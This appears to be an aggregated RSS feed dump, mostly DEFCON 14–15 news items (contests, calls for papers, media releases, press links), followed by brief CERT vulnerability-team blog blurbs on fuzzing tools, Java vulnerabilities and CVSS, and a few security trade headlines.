https://www.defcon.org/defconrss.xml DEFCON 15 Artwork Contest Guidelines DEFCONDEFCON Submission deadline: All submissions must be received by June 25, 2007. Submit all entries to: sleestak\at\defcon dot org What we will do with your artwork: Art contests submissions will be added on-line to the DEFCON web site and may be included in the con program. By submitting artwork us, you are allowing DEFCON to publish and reproduce your artwork in electronic and print formats. Categories: Web Banner Key Card T-shirt Wallpaper Required Elements: Artwork should incorporate a version of the following text: DEFCON / DefCon / Def Con with the number 15 / 2007 / Fifteen / 0x0F / XV / etc.. you get the point. It ties DEF CON to the year of the con. Artwork Preparation Specs: All continuous tone artwork must be at least 600dpi The following formats are accepted for artwork: - .EPS with Vector preferred, all fonts converted to outline - .Jpg - .Gif - .Psd - layers with all fonts converted to outline ***We strongly recommend Illustrator Vector artwork for any submissions for the T-shirt or Key Card categories since these will need to be reproduced in print. Prizes: 1. Winners will be contacted individually and be announced on the website and recognized in the DEFCON 15 printed program. 2. There may be multiple winners per category. 3. DEFCON reserves the right to not select a winner for every category Banner Art Prize: - The first place winner will receive free admission to DEFCON 15 for one person (non-transferable to a future con),$50 credit that may be used at the official DEFCON SWAG Store and recognition in the con program and website. T-Shirt Art Prize: Free admission to DEFCON 15 for two persons, $130 credit that may be used at the official DEFCON SWAG Store and recognition in the con program and website. Wallpaper Art Prize: Free admission to the conference for one person, $50 credit that may be used at the official DEFCON SWAG Store

==> Announcing Brew Wars!

https://www.defcon.org/defconrss.xml Announcing Brew Wars for DC 15! It's time to remind everyone of Brew Wars again. The very first Brew Wars will happen this year at Defcon 15. The rules are simple. Just bring twenty four ounces of your home brew to Defcon. A judging panel of three people, including myself, will drink and rate each brew. The beer will be rated on a scale of 1-10. Each beer will be judged in it's catergory. The standard of each category of beer is last year's winner of the Great American Beer Festival in the style you have entered. A list of those winning beers can be found at the URL below. http://www.beertown.org/events/gabf/...medalists.aspx The judges will be blind tasting the beers. The only information given to the judges will be what style of beer it is. Judges will not be allowed to enter their own brews. Judges have already been selected. All judges are were at the GABF and sampled all winning brews. Extensive tasting notes were taken at the time. I have sourced a glass carboy for the winner. This carboy will be etched will a logo commemorating the event. If your beer is good enough, you could soon be brewing your next batch in a unique carboy. Dr. Faustus

==> Robot Wars Arena Updated!

https://www.defcon.org/defconrss.xml Arena Updated! We've started building the new arena for this year's robot contest. The details about the arena and the build photos are here: http://defconbots.org/defcon15/arena.php So now that it's (almost) done, teams are invited to come practice on the actual arena if you want to get yourself to Orange County, CA :) If anyone has questions or if you need more detailed photos, please let me know! Kallahar

==> Contests starting up for DEFCON 15!

https://www.defcon.org/defconrss.xml DEFCON 15 Contests are starting to get organized! Interested in running a contest or competing in one? Check out the current list of what's happening over on the forums. Capture the Flag is back in full force, the Toxic BBQ is in effect, the Black and White Ball will happen as usual, and a whole host of new contests are getting ready. Some of them include: - The Amateur CtF - Beverage Cooling Contest - Brew Wars! - Coffee Wars - DefconBots Robot Contest - Hacker Jeopardy - Lockpicking Contest - LosT @ Con Mystery Challenge - QueerCon - Spot the Fed -The Summit meeting and party - Sushicon - Wireless Village, Lockpick Village and RFID village! - Sekret Challenge!

==> DEFCON 15 CFP Now Open!!

https://www.defcon.org/defconrss.xml DEFCON 15 Call For Papers is now officially Open and will close on June 15, 2007. Don't know what DEFCON is? Go to https://www.defcon.org/ and clue up! Papers and presentations are now being accepted for DEFCON 15, the conference your mother and ISC(2) warned you about. DEFCON will take place at the Riviera in Las Vegas, NV, USA, August 3-5, 2007. Last year, we eliminated speaking tracks, and we received a diverse selection of submissions. From hacking your car, your brain, and CIA sculptures to hacking the vote, Bluetooth, and DNS hacks. We group presentations by subject and come up with topic areas of interest. It worked out so well in the past we are doing it again. What are we looking for then, if we don't have tracks? Were looking for the presentation that you've never seen before and have always wanted to see. We are looking for the presentation that the attendees wouldn't ask for, but blows their minds when they see it. We want strange demos of Personal GPS jammers, RFID zappers, and HERF madness. Got a MITM attack against cell phones? We want to see it. Subjects that we have traditionally covered in the past, and will continue to accept include: Trojan development, worms, malware, intelligent agents, protocol exploits, application security, web security, database hacking, privacy issues, criminal law, civil law, international law/treaties, prosecution perspectives, 802.11X, bluetooth, cellular telephony protocols, privacy, identity theft, identity creation, fraud, social implications of technology, media/film presentations, firmware hacking, hardware hacking, embedded systems hacking, smartcard technologies, credit card and financial instrument technologies, surveillance, counter-surveillance, UFO's, peer2peer technologies, reputation systems, copyright infringement and anti-copyright infringement enforcement technologies, critical infrastructure issues, physical security, social engineering, academic security research, PDA and cell phone security, EMP/HERF weaponry, TEMPEST technologies, corporate espionage, IDS evasion. What a mouth full! Well you can't say we didn't give you some ideas. This list is not intended to limit possible topics, merely to give examples of topics that have interested us in the past, and is in fact the same list we used last year.. Check out https://www.defcon.org/html/defcon-14/dc-14-speakers.html for past conference presentations to get a complete list of past topics that were accepted if you want to learn from the past. We are looking for and give preference to: unique research, new tool releases, day attacks (with responsible disclosure), highly technical material, social commentaries, and ground breaking material of any kind. Want to screen a new hacking documentary or release research? Consider DEFCON. Speaking Formats: Choose between 12 hundred seconds, 50 minutes, 110 minutes, or a break out format of a length you determine. We are continuing the Twelve Hundred Second Spotlight, which is a shorter presentation (about twenty minutes) that doesn't warrant a full 50 or 110 minute talk. The Twelve Hundred Second Spotlight is designed for those who don't have enough material for a full talk, but still have a valuable contribution to make. This is to ensure that great ideas that can be presented quickly don't fall through the cracks merely because they didn't justify a full length talk. Examples include research, announcements, group presentations, projects needing volunteers or testers, requests for comments, updates on previously given talks, quick demonstrations. You get the idea. Presenters will get a speaker badge which entitles them to free admittance to DEFCON, but we will be unable to pay an Honorarium. Remember being attacked by flying meat? Do you remember thick accented Germans trying to convince you to attack critical infrastructure? Do you remember extravagant vapor ware releases by a stage filled with posses? We do, and sans projectiles of raw meat we want to encourage such shenanigans again this year. We are calling on all "hacker groups" (you know who you are, and the FBI has a nifty file with your name on it) to present at DEFCON, to discuss what you're up to, what your mission is, to discuss any upcoming or past projects, and to discuss parties/conferences you are throwing. We do humbly request that all gang warfare be relegated to electronic attacks, and not fall over into meat space. New for DEFCON 15: The second year being at the Riviera has allowed us to make some changes to the format from last year. We have more speaking rooms, and because of this I want to announce a call for workshops, demos, and mini trainings. We have additional small rooms that will enable highly focused demonstrations or workshops. If you want to talk about building a passport cloner or a tutorial on developing Metasploit exploits this might be the format for you. You tell us how much time you need, and we try to accommodate you! To submit a speech Complete the Call for Papers Form at: https://www.defcon.org/html/defcon-15/dc-15-cfp-form.html and send to talks at defcon dot org. You will receive a confirmation within 48 hours of submission. We are going to continue last year's goal of increasing the quality of the talks by screening people and topics. I realize you guys are speaking for basically free, but some talks are better than others. Some people put in a bit more effort than others. I want to reward the people who do the work by making sure there is room for them. This year we will have two rounds of speaker acceptance. In the first round we will fill about half of the schedule before the submission deadline, and the remaining half afterwards. This is to encourage people to submit as early as possible and allows attendees to plan on the topics that interest them. If you see the schedule on-line start to fill, do not worry if you have not heard from us yet, as we are still in the process of selection. Barring a disaster of monstrous proportions, speaker selection will be completed no later July 1. The sooner you submit the better chance you have of the reviewers to give your presentation the full consideration it warrants. If you wait until the last minute to submit, you have less of a chance of being selected. After a completed CFP form is received, speakers will be contacted if there are any questions about their presentations. If your talk is accepted you can continue to modify and evolve it up until the last minute, but don't deviate from your accepted presentation. We will mail you with information on deadlines for when we need your presentation, to be burnt on the CDROM, as well as information for the printed program. Speakers get in to the show free, get paid (AFTER they give a good presentation!), get a coolio badge, and people like you more. Heck, most people find it is a great way to meet people or find other people interested in their topics. Speakers can opt to forgo their payment and instead receive three human badges that they can give to their friends, sell to strangers, or hold onto as timeless mementoes. Receiving badges instead of checks has been a popular option for those insisting on maintaining their anonymity. Please visit: https://www.defcon.org/ for previous conference archives, information, and speeches. Updated announcements will be posted to news groups, security mailing lists and this web site. https://forum.defcon.org/ for a look at all the events and contests being planned for DEFCON 15. Join in on the action. https://pics.defcon.org/ to upload all your past DEFCON pictures. We store the pictures so you don't have to worry about web space. If you have an account on the forums, you have an account here. https://www.defcon.org/defconrss.xml for news and announcements surrounding DEFCON. CFP forms and questions should get mailed to: talks/at/defcon.org

==> CSI: TCP/IP by Robin Mejia at wired.com

https://www.defcon.org/defconrss.xml "Keep your friends close and your enemies closer. Why the Pentagon's toughest Internet crime fighter likes hanging out with blackhat hackers" is the sub title of the article. DEFCON It turns out to be a well written piece about Jim Christy's career and the birth of the DoD Cybercrime Center. It is set to a back drop of DEF CON 14, and has a couple funny bits, some interesting war stories plus a quote from me. A snip from the article: "Christy points out a pulsing vein in the guy's neck suggesting it's a sign he is lying. The guy calls Christy an old man. He hints that maybe he might have some small connection to Mossad. As he finally sits down, Christy passes him a business card."

==> Don't Be a Slacker, DEFCON 15 WANTS YOU!

https://www.defcon.org/defconrss.xml Starting March 1st we will be opening the call for papers for DEFCON 15 - the annual gathering of subversive computer folks. Earlier submissions are given higher priority, so prepare your best kung-foo, and send it our way. Remember, we are always looking for original and highly technical content, unusual subject matters, software releases, innovative hardware hacking, and generally mind-blowing content. Check out past convention archives to get an idea of what we are talking about. Once the date is closer there will be more specifics.. I just wanted to give everyone a heads up!

==> DEFCON 14 Video now available!

https://www.defcon.org/defconrss.xml DEFCON has released the second batch of content from DC-14 encoded for download. This marks the third step of moving away from the real media server to a direct download model in an effort to spread far and wide the presentations from past DEFCON conventions. The new media server will be going on-line in the next month, and because the old media server is out of drive space you will notice that all DC 7 content has been taken off line to make room. Once the new media server is on-line all past content will be restored!

==> DEFCON 14 Audio now available!

https://www.defcon.org/defconrss.xml DEFCON has released the first batch of content from DC-14 encoded for download. This marks the third step of moving away from the real media server to a direct download model in an effort to spread far and wide the presentations from past DEFCON conventions.

==> Happy Holidays!

https://www.defcon.org/defconrss.xml Happy Holidays from all of us here at Defcon! We would like to wish you the best this Holiday season. We hope you have plenty of family, food and fun to go around. If you get bored you can always gather the family around the warm glow of your flat screen to watch the ghosts of presentations past. There is no better gift than that. Unless of course your loved ones headed over to Jinx and got you some sweet Defcon gear! We also wanted to remind you that pics.defcon.org is up and running, we are looking forward to seeing it grow with the new year. If you get together with your fellow hackers this holiday season, or mod that must have Christmas gift, feel free to upload your photos in the members and dc groups galleries. That said, Eat plenty of other peoples food, stay up late with your new shiny toys and have fun with friends and family. See you next year!

==> DEFCON 14 Presentations On-Line!

https://www.defcon.org/defconrss.xml We've gotten in some updated presentations, and have updated www.defcon.org to make them all available. So if you want to see the slides to a preso you missed, check out the link below. DEFCON Next up we'll be posting the audio and video from DC-14 for download.. DEF CON's XMas present to the community, coming in December.

==> pics.defcon.org now live!

https://www.defcon.org/defconrss.xml pics.defcon.org is now live for use. DEFCONDEFCON What is it you ask? Think of it as a repository for all pictures related to DEF CON. It is a place you can upload your pictures and arrange them however you want. Others can comment on them, vote, or put them in their own favorites album. The idea is that as people change providers there is no long term repository for DEF CON pictures except to the links www.defconpics.org points to. Because they don't mirror the content I wanted to create a free place for people to share their pictures that won't change or go down. The pics software is integrated with the defcon forums, so if you already have an account there you automatically have an account on pics.defcon.org. So get busy! Upload those pictures. both http and https connections work. Spread the word!

==> DEFCON 12 Audio now available!

https://www.defcon.org/defconrss.xml DEFCON has released the first batch of content from DC-12 encoded for download. This marks the second step of moving away from the real media server to a direct download model in an effort to spread far and wide the presentations from past DEFCON conventions.

==> DEFCON 12 Video now available!

https://www.defcon.org/defconrss.xml DEFCON has released the second batch of content from DC-12 encoded for download. This marks the second step of moving away from the real media server to a direct download model in an effort to spread far and wide the presentations from past DEFCON conventions.

==> DEFCON 13 Videos of the Music from the Black and White ball now on-line!

https://www.defcon.org/defconrss.xml Here are the music videos of the music from the Black and White Ball at DEFCON 13. DJs include Wintamute, Ms. Jackalope, Shatter, Kris Klink and Casey with the bands Catharisis and Regenerator in the house!

==> DEFCON 13 Music from the Black and White ball now on-line!

https://www.defcon.org/defconrss.xml We took the audio .wav files and encoded them into .mp3 files. DJs include Wintamute, Ms. Jackalope, Shatter, Kris Klink and Casey with the bands Catharisis and Regenerator in the house!

==> DEFCON 14 Speakers Selected!

https://www.defcon.org/defconrss.xml Hey everyone, I want to make some announcements surrounding DEFCON 14. DEFCONDEFCONDEFCONDEFCON It's about that time to briefly lay down the inf0z, so here it goes. - Speakers have been selected, and are now listed on-line: http://www.defcon.org/html/defcon-14/dc-14-schedule.html They include an assistant Secretary of Defense, an FBI agent, Scary Hackers, privacy fanatics, security studs, and a hardware hacking ninja. - The con hotel is sold out, but overflow exists here: http://www.defcon.org/html/defcon-14/dc-14-hotel.html - Need a ride or got a room to spare? Check out the ride and room section of the DEF CON Forums https://forum.defcon.org/forumdisplay.php?f=26 - There are a lot of new contests, and some old ones that are no more (We'll miss you WiFi Shootout!) I'd mention them all, but it takes up too much space. To get a good grip on what is happening I'd suggest reading the contest area of the forums: https://forum.defcon.org/forumdisplay.php?f=102 - Black and White Ball is two nights this year, with some great bands and DJs including Regenerator, The Minibosses, DJ Jackalope, Catharsis and DJ Wintamute. - DEF CON 13 Audio and Video is now on-line for DOWNLOAD. Yep, you saw that right. We are phasing out the real media server and going to download mode. The audio is in .mp3, and the video is in H.264 2-pass 192k .mp4, optimized for the iPod video screen size. Right now you gotta subscribe to the rss feed, but the web site will soon sport the direct links. We hope to have DC-12 on-line in the next week. http://www.defcon.org/defconrss.xml Notes: This year we are at a new hotel, the Riviera. I did this because DEF CON was going to stagnate and die if it stayed at the Alexis Park any longer. The benefits of the new hotel are that the speaking rooms are larger, there is air conditioning, and we have room to grow. This year we get about 1/2 the space, and next year we should get 3/4 of the space. That extra room will allow us to offer break out classes, get togethers, and an additional track of speaking. Things we could only dream of before, but now are possible. It will take us all a year or two to learn what to do with all the space, but those are the kinds of problems I can live with. Did I mention the sky boxes? General hang out site: http://forum.defcon.org/ Remember DEF CON is what you make of it, and we have been lucky over the years to have a great group of people supporting us. The line up this year looks great, and the rest is up to us.

==> Crypto utopia Sealand ravaged by fire by Andrew Orlowski

https://www.defcon.org/defconrss.xml Andrew over at The Register writes about a fire that broke out on Sea Land wrecking the generator room. For those not familiar, there was a talk by Ryan Lacky of HavenCo, a company set up on Sea Land to provide privacy services. I believe it inspired some of the characters in Neil Stephenson's Cryptonomicon book (Go read it.. very good) I've wondered what happened since the business imploded in 2003, but from the article it seems not much. Fire has damaged a World War II gun emplacement seven miles off the English coast. Better known as "Sealand", the fort was acquired in the 1960s by Roy Bates, who declared it an independent principality." "In a presentation to the 2003 DefCon convention, a former employee described how internal politics and a lack of investment backing had thwarted the experiment. Contracts were broken, the bandwidth never materialised, and the location was vulnerable to DOS attacks. At the time [6] of his 2003 presentation, HavenCo had no new customers, and had seen several of its existing customers leave."

==> DEFCON 12 Music from the Black and White ball now on-line!

https://www.defcon.org/defconrss.xml We took the audio .wav files and encoded them into .mp3 files. We are working on DC-13 music next!

==> Cybersecurity contests go national by Robert Lemos

https://www.defcon.org/defconrss.xml I saw this over on SecurityFocus written by Rob Lemos, a long time Info Sec reporter with a solid reputation. It is a piece about how "Cybersecurity" events are going national. From Old old CTF games, to DEFCON, to the Cyber Defense Exercise (CDX) to the new CCDC it is all a progression of learning through different game challenges. It makes a couple brief mentions of DEFCON, but does not explain who or what we are. That's OK. If people really want to know, they'll find us.. From the article: "As the hackers came in, you could see (the students') reactions: They were frustrated when they saw the attackers breach their systems and excited when they stopped the attack," said John Carr, a mentor for the team fielded by Valley High School of West Des Moines and senior solutions consultant with Iowa-based technology consulting firm QCI."

==> DEFCON 13 Audio now available!

https://www.defcon.org/defconrss.xml DEFCON has released the first batch of content from DC-13 encoded for download. This marks the first step of moving away from the real media server to a direct download model in an effort to spread far and wide the presentations from past DEFCON conventions. DEFCON The second release is .mp3 audio files in a friendly CBR 64k format. As time goes on we will be re-encoding all previous conference content and releasing it! Next up DEFCON 13 DJ music and video..

==> Database giant and British hacker make amends.

https://www.defcon.org/defconrss.xml From By Robert McMillan at Computerworld some words about database security researcher and Oracle. DEFCON devotees may well recognize David's and Caesar's contributions to this space. Oracle once marketed its database as unbreakable, but security researcher David Litchfield has a less inflated opinion of the software. "God forbid that any of our critical national infrastructure runs on this product," he said recently on the widely read Bugtraq security mailing list. Oops it does.

==> Ride and Room sharing forum now open

https://www.defcon.org/defconrss.xml Going to DEFCON 13? Want to share a ride or a room? Got extra space in your car or room? Now is your chance to find others and make new friends. From TheCotMan's post about this: Suggestions: Your best bet in finding a ride, or room sharing is actually found by attending your local Defcon User Group, getting to know people in person, who then may give you space in their room. Trying to hook up with people on the Defcon Forums is a tricky thing. Generally, strangers won't offer other strangers space in their room. People will want some sort of references-- someone both parties know and trust to vouch for you. The Unofficial Defcon Faq http://defcon.stotan.org/faq/ was written by many, and assembled by HighWizard. It has some outdated information for when the convention was at the Alexis Park but also has some useful information about room sharing, and life at Defcon. Good luck.

==> DEFCON 13 Video now available!

https://www.defcon.org/defconrss.xml DEFCON has released the first batch of content from DC-13 encoded for download. This marks the first step of moving away from the real media server to a direct download model in an effort to spread far and wide the presentations from past DEFCON conventions. The first release is .mp4 video files in an iPod friendly h.264 format. Soon to follow will be the .mp3 versions of all the same presentations. As time goes on we will be re-encoding all previous conference content and releasing it!

==> DEFCON 14 Speaker Selection now underway.

https://www.defcon.org/defconrss.xml The speaker selection process for DEFCON 14 is now underway, with early selections being made. While the CfP closes officially in two weeks, we are doing early selection to fill half the speaking spots now to speed things up. We will try very hard to have the process completed in two weeks, right at the end of the deadline. We'll be making announcements on-line as well as on forums and mailing lists. If you submitted a talk, look for acceptance or rejections over the next two weeks in your email. I am proud to say some of the submissions this year are of very high quality, and we should break in the Rivera with some killer content. As usual we are talking about the con over on the forum.defcon.org system.

==> www.defcon.org now serving compressed content!

https://www.defcon.org/defconrss.xml Well it has taken a bit of work to get the old web server happy with serving http 1.1 compressed content, but now that it is you should see a speed improvement in page views as well as availability. These changes are in preparation for the site and server change over, something that I hope will happen in the next week. If your browser supports content-encoding compressed, you should see a gain! Also note that forums.defcon.org is also enabling compression later this week after some testing. This is a good thing leading up to the convention because it is effectively like buying more bandwidth with a software upgrade.

==> Capture the Flag pre-qualification opens!

https://www.defcon.org/defconrss.xml From Kenshoto's announcement: Once again ... kenshoto will be running the Defcon Capture the Flag contest in 2006. This year's CtF will be a knock-down-drag-out-cyberninja war, the likes of which the world has never seen (except maybe last year). For the qualifying round, we've widened the scope from last year. With multiple challenges in various categories, there's something for every hacker, regardless of skillset (except running scripts and writing perl). The core skill for this contest will be finding vulnerabilities in software. Those of you who have avoided playing in CtF because you think it is for lamers, we bet you can't find all our vulnerabilities. Teams will still need to defend a server, and will need to be able to exploit the vulnerabilities they find. As last year, the vulnerabilities will be 100%-custom, so leave your nessus, metasploit and core impact bleep at home. There will be a qualifying round, which will start on Friday, June 9th at 10:00 PM EDT. Only 8 teams will qualify. Last year's winners,Shellphish, are automatically qualified (leaving 7 team slots), unless they too decide to play in the qualifying round, in which case they will still need to place in the top 8. Registration is currently open at http://kenshoto.com/quals/ We encourage anyone (even individuals) to attempt to qualify, even if as a learning experience. We intend quals to be enjoyable for everyone,regardless of your plans for Defcon. Challenges will range wildlyin difficulty from Mitnick to Eagle we've got it all. Good luck... you're going to need it. -kenshoto

==> DEFCON 14 CfP Closes at the end of the month!

https://www.defcon.org/defconrss.xml The Call for Papers for DEFCON 14 is closing soon. June 15th is the cut off date, but we will start making early speaking selections in the next two weeks.

==> Most lengthy DC trip report, ever. (warning, pdf)

https://www.defcon.org/defconrss.xml Want to get a groups perspective of DC13? While this 133 page .pdf is largely copied from various speeches, there are some pretty pictures, and the various contributors to the report did a good job. It must have been some work to put together. Check it out, and if you know of other reports like this one, please let us know.

==> DEFCON 14 Beta FAQ v0.95 Now Available!

https://www.defcon.org/defconrss.xml An update to the official FAQ talking about DEFCON and DEFCON 14. Questions and Answers about the new hotel location, costs, events, resources and more. The next update will include a split into two FAQs. One for general DEFCON questions, and one for DEFCON 14.

==> DEFCON places below pumpkin hurling contest!

https://www.defcon.org/defconrss.xml Who hails DEFCON as a noncommercial event, calls its attendees 'digital cognoscenti', throws in a oblique Linus bleep quote, and places DC as the 8th best north American geek fest? Follow the link to find out!

==> DEFCON 14 Call for Papers Open!

https://www.defcon.org/defconrss.xml We are opening the call for papers for DEFCON 14 - the annual gathering of subversive computer folks. Earlier submissions are given higher priority, so prepare your best kung-foo, and send it our way. Remember, we are always looking for original and highly technical content, unusual subject matters, software releases, innovative hardware hacking, and generally mind-blowing content. Check out past convention archives to get an idea of what we are talking about.

==> Getting a job as a Pen-Tester, DEFCON style

https://www.defcon.org/defconrss.xml If you thought being a pen-tester required knowledge, skill, and professionalism, Dmitri sets the record straight. His step-by-step tutorial will teach you how to write incoherent emails, slap imposing stickers on your notebook, and mumble with enough techno-bleep to become a world-renowned pen-tester at a big-name firm. Check out Dmitri's blog for the full article.

==> Trends of 2006 - Stealth Rootkit techniques as introduced at DC13 by Sherri Sparks and Jamie Butler

https://www.defcon.org/defconrss.xml Dennis Moreau, CTO of Configuresoft Inc, discusses security trends likely to appear in the coming year. In addition to discussing the limitations to black-list based security technologies, he highlights a dramatic DEFCON 13 speech. Sherri Sparks and Jamie Butler presented "Shadow-Walker" Raising The Bar For Rootkit Detection.

==> Global Capture the Flag comes to the classrooms worldwide

https://www.defcon.org/defconrss.xml 22 student teams from 18 universities on four continents competed in the largest Capture the Flag event ever attempted. Inspired by DEFCON's CTF and organized by DEFCON CTF winner Professor Vigna, the CTF event differed from DEFCON's contest in by not limiting the amount of teams and having international participation. Vigna's page describes his contest in enough detail to allow others to set up their own contests.

==> Renderman to the rescue!

https://www.defcon.org/defconrss.xml Renderman, winner of various contests at DEFCON is written about in this article. "A Las Vegas magazine once described Renderman as "infamous,'' which he admits was flattering. He's only famous to other hackers."

==> DEFCON Staff, Speakers release new book "OS X for Hackers at Heart"

https://www.defcon.org/defconrss.xml Longtime DEFCON staffer Chris Hurley collaborates with DEFCON Speakers Bruce Potter, Johnny Long, and Ken Caruso to produce "OS X for Hackers at Heart."

==> DEFCON.ORG now SSL enabled!

https://www.defcon.org/defconrss.xml DEFCON.ORG is now SSLorized for your enhanced privacy and crypto happiness. Also SSL enabled for more private discussions - forum.defcon.org.

==> DEFCON 13 Write-up in the current issue of Blacklisted! 411

https://www.defcon.org/defconrss.xml The fall 2005 issue of Blacklisted! 411 has an extensive six page write-up of DEFCON that's worth reading. If you've never read Blacklisted, you should - it's a worthy mag.

==> DEFCON 14 Beta FAQ v0.91 Now Available!

https://www.defcon.org/defconrss.xml The first official FAQ talking about DEFCON, and DEFCON 14. Questions and Answers about the new hotel location, costs, events, resources and more. Please check it out and provide feedback so we can get a really solid v 1.0 FAQ out by the end of the year!

==> HP fires real bullet at Storageworks array

https://www.defcon.org/defconrss.xml <P>Charlie Demerjian over at the Inquirer has a piece about HP shooting a .308 bullet at an XP12000 storage array, and the array still functioning. I have questions about where the bullet actually went, I mean if it smashed all the controller cards or went through the power supplies it wouldn't still function. But hey! They got it just right. The best part, though, is the end.</P> <P>'The XP12000 was then brought back to a fully functional state without any loss of uptime. Not bad at all. As far as I know, this is the only test of it's type, but I am sure we could arrange something similar at DefCon if Sun wants to loan us a 15K.'</P>

==> DNS and Site Updates

https://www.defcon.org/defconrss.xml As DEFCON 14 gets closer, I plan on making some major network changes to better support the convention. I plan on moving the web site, forum, and store to new servers and ip addresses in the next month. Shortly after that I will be upgrading the media server and starting to release past conference archives for download. That is right, you read it here! No more real media streaming, soon you will be able to D/L the files directly in h.264 (Video iPod compatible) format. So this is just a heads up that things will be switching around over the next month or so.

==> The Hidden Threats of Security Certificates

http://www.baselinemag.com/rss-feeds-65.xml Until the Flame malware incident, many IT leaders had been unaware of a hidden danger in their security infrastructure: ineffective certificate management.

==> Data Breaches Grow ... and Grow More Serious

http://www.baselinemag.com/rss-feeds-65.xml As networks and computer systems grow more sophisticated, cyber-crooks are keeping pace and finding new ways to exploit weaknesses. The recently released 2012 "Data Breach Investigations Report", along with industry snapshots from Verizon Communications, offers insights into the current state of security. It found that corporate data theft reached 855 incidents and 174 million compromised records over the last year. "Mainline cyber-criminals are achieving 'economies of scale' by automating and streamlining highly repetitive—but quick and effective—attack methods," explains Wade Baker, principal author of the Verizon Data Breach Investigations Report series. "Organizations achieve very high levels of security in numerous areas but neglect others." Many of those attacks targeted trade secrets, classified information and other intellectual property, Verizon found. The instigators relied on a number of methods—including hacking, physical security breaches and social engineering—to extract the data they desired. Here are some of the highlights (or lowlights) from the report.

==> Forking and Joining Python Coroutines to Collect Coverage Data

http://www.cert.org/blogs/vuls/rss.xml In this post I'll explain how to expand on David Beazley's cobroadcast pattern by adding a join capability that can bring multiple forked coroutine paths back together. I'll apply this technique to create a modular Python script that uses gcov, readelf, and other common unix command line utilities to gather code coverage information for an application that is being tested. Along the way I'll use ImageMagick under Ubuntu 12.04 as a running example.

==> A Look Inside CERT Fuzzing Tools

http://www.cert.org/blogs/vuls/rss.xml Hi, this is Allen Householder of the CERT Vulnerability Analysis team. If you've been following this blog for a while, you are probably familiar with our fuzzing tools: Dranzer, the CERT Basic Fuzzing Framework (BFF), and the CERT Failure Observation Engine (FOE). While creating tools that can find and analyze vulnerabilities makes up a significant portion of our work in the CERT Vulnerability Analysis team, our focus is on developing and communicating the knowledge we've built into those systems. To that end, we recently published a pair of reports that describe a few of the heuristics and algorithms implemented in the BFF and FOE fuzzing tools. We briefly mentioned these techniques in the release announcements for the tools, but did not describe how they work in detail. Abstracts and links to the reports can be found below.

==> Updates to CERT Fuzzing Tools (BFF 2.6 & FOE 2.0.1)

http://www.cert.org/blogs/vuls/rss.xml Hi everybody. Allen Householder from the CERT Vulnerability Analysis team here, back with another installment of "What's new in CERT's fuzzing frameworks?" Today we're announcing the release of updates of both our fuzzing tools, the CERT Basic Fuzzing Framework (BFF) version 2.6 and the CERT Failure Observation Engine (FOE) version 2.0.1. The remainder of this post describes the changes in more detail.

==> Java 7 Attack Vectors, Oh My!

http://www.cert.org/blogs/vuls/rss.xml While researching how to successfully mitigate the recent Java 7 vulnerability (VU#636312, CVE-2012-4681), we (and by "we" I mean "Will Dormann") found quite a mess. In the midst of discussion about exploit activity and the out-of-cycle update from Oracle, I'd like to call attention to a couple other important points.

==> The Report "Network Profiling Using Flow" Released

http://www.cert.org/blogs/vuls/rss.xml Hi, this is Austin Whisnant of the CERT Network Situational Awareness Team (NetSA). After a long time in the making, NetSA has published an SEI technical report on how to inventory assets on a network using network flow data. Knowing what assets are on your network, especially those visible to outsiders, is an important step in gaining network situational awareness.

==> Java Security Manager Bypass Vulnerability

http://www.cert.org/blogs/vuls/rss.xml Last Sunday, another major Java vulnerability (VU#636312) was reported. Until an official update is available, we strongly recommend disabling the Java 7 plug-in for web browsers.

==> CERT Failure Observation Engine 2.0 Released

http://www.cert.org/blogs/vuls/rss.xml Hi folks, Allen Householder from the CERT Vulnerability Analysis team here. Back in April, we released version 1.0 of the CERT Failure Observation Engine (FOE), our fuzzing framework for Windows. Today we're announcing the release of FOE version 2.0. (Here's the download.) Although it has only been a few months since we announced FOE 1.0, our development cycle is such that FOE 2.0 actually reflects nearly a year of additional improvements over the 1.0 release. Our main focus in developing FOE 2.0 was to apply what we learned from creating the CERT Basic Fuzzing Framework version 2.5 for Linux and OS X to improve our fuzzing capabilities on Windows. We are gradually converging our code bases for BFF and FOE to simplify maintenance and the incorporation of new features. We're not quite there yet, but FOE 2.0 reflects a significant step in that direction. Read on for more details.

==> Vulnerability Data Archive

http://www.cert.org/blogs/vuls/rss.xml With the hope that someone finds the data useful, we're publishing an archive of almost all of the non-sensitive vulnerability information in our vulnerability reports database.

==> CERT Basic Fuzzing Framework 2.5 Released

http://www.cert.org/blogs/vuls/rss.xml Hi folks, Allen Householder here. In addition to the recent introduction of our new Failure Observation Engine (FOE) fuzzing framework for Windows and Linux Triage Tools, we have updated the CERT Basic Fuzzing Framework (BFF) to version 2.5. This post highlights the significant changes.

==> CERT Linux Triage Tools 1.0 Released

http://www.cert.org/blogs/vuls/rss.xml As part of the vulnerability discovery work at CERT, we have developed a GNU Debugger (GDB) extension called "exploitable" that classifies Linux application bugs by severity. Version 1.0 of the extension is available for public download here. This blog post contains an overview of the extension and how it works.

==> Vulnerability Severity Using CVSS

http://www.cert.org/blogs/vuls/rss.xml If you analyze, manage, publish, or otherwise work with software vulnerabilities, hopefully you've come across the Common Vulnerability Scoring System (CVSS). I'm happy to announce that US-CERT Vulnerability Notes now provide CVSS metrics.

==> CNAME flux

http://www.cert.org/blogs/vuls/rss.xml Hello this is Jonathan Spring. Recently, Leigh Metcalf and I uncovered some interesting results in our continuing work on properties of the Domain Name System (DNS). Our work involves an unconventional use of CNAME (canonical name) records. Besides an IP address, CNAME records are the only other location a domain may have in the DNS. Instead of an IP address, a CNAME record is a redirection or alias service that points to another name.

==> Challenges in Network Monitoring above the Enterprise

http://www.cert.org/blogs/vuls/rss.xml Recently George Jones, Jonathan Spring, and I attended USENIX Security '11. We hosted an evening Birds of a Feather (BoF) session where we asked a question of some significance to our CERT® Network Situational Awareness (NetSA) group: Is Large-Scale Network Security Monitoring Still Worth Effort?

==> Detecting Abnormal Technology Systems Behavior

http://www.compliancehome.com/rss/resources-GLBA.xml With hundreds and thousands of automated systems producing log data, an organization's ability to respond to

==> Upgraded Version of WebSearch Launched by DocuLex

http://www.compliancehome.com/rss/resources-GLBA.xml WebSearch version 4.2 that boasts of additional features like customized business process and collaborative workflow capability has been introduced by DocuLex, Content management software provider. WebSearch version 4.2 is a product of DocuLex Archive Studio that helps organizations with decision making power via automation of any business process through the benefit of systematic workflow.

==> Model Consumer Privacy Notice Online Form Builder Released by Federal Regulators

